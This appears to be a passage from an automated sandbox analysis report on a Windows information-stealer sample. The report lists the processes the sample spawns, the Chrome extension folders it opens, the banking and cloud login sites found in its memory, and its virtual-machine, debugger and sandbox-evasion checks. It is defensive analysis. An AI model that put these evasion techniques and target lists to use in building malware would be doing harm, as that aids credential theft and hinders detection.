Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ba77748b9b.exe, 0000002E.00000002.2853920976.000000000274D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: KJEHJKJE.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: KJEHJKJE.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: KJEHJKJE.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: axplong.exe, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareoC
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: KJEHJKJE.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: KJEHJKJE.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: KJEHJKJE.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KJEHJKJE.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: KJEHJKJE.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.13.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: KJEHJKJE.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: KJEHJKJE.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RoamingBKKFHIEGDH.exe, 00000005.00000002.2269772396.0000000000C51000.00000040.00000001.01000000.00000009.sdmp, RoamingAEGIJKEHCA.exe, 00000008.00000002.2345735174.00000000005CE000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 00000009.00000002.2308351470.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2311209476.00000000010C1000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.2374969784.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000010.00000002.2374830999.0000000000BAE000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: KJEHJKJE.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: KJEHJKJE.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.00000000026F9000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.0000000002825000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842C6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3029095226.000001F16D6CC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2918689311.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2942846800.000001F16D745000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2856295783.00000130BDC1D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: KJEHJKJE.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 00000028.00000002.2881327122.00000261842C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: KJEHJKJE.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RoamingBKKFHIEGDH.exe, 00000005.00000002.2273581727.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: build2.exe, 0000002C.00000003.2918689311.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2942846800.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.3002033924.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2917481359.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2968342255.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3029095226.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2927088647.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2999657910.000001F16D745000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000003.2979868835.000001F16D745000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~V
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: KJEHJKJE.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: KJEHJKJE.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: KJEHJKJE.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: KJEHJKJE.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2947483134.00000000065A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2744972040.00000261842EC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751919295.00000261842EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2866002491.00000130BDD00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD806000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW"<
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

Code function: 5_2_04EC0983 rdtsc

5_2_04EC0983

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0041ACFA

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000

0_2_00404610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_004195E0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h]

0_2_00419160

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter,	0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041A718
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C70B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C70B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C8BAC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ba77748b9b.exe PID: 8448, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_004190A0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe "C:\Users\user\AppData\RoamingBKKFHIEGDH.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe "C:\Users\user\AppData\RoamingAEGIJKEHCA.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe "C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ead6a72944.exe "C:\Users\user\1000003002\ead6a72944.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe "C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe "C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe "C:\Users\user\AppData\Local\Temp\1000028001\build2.exe"
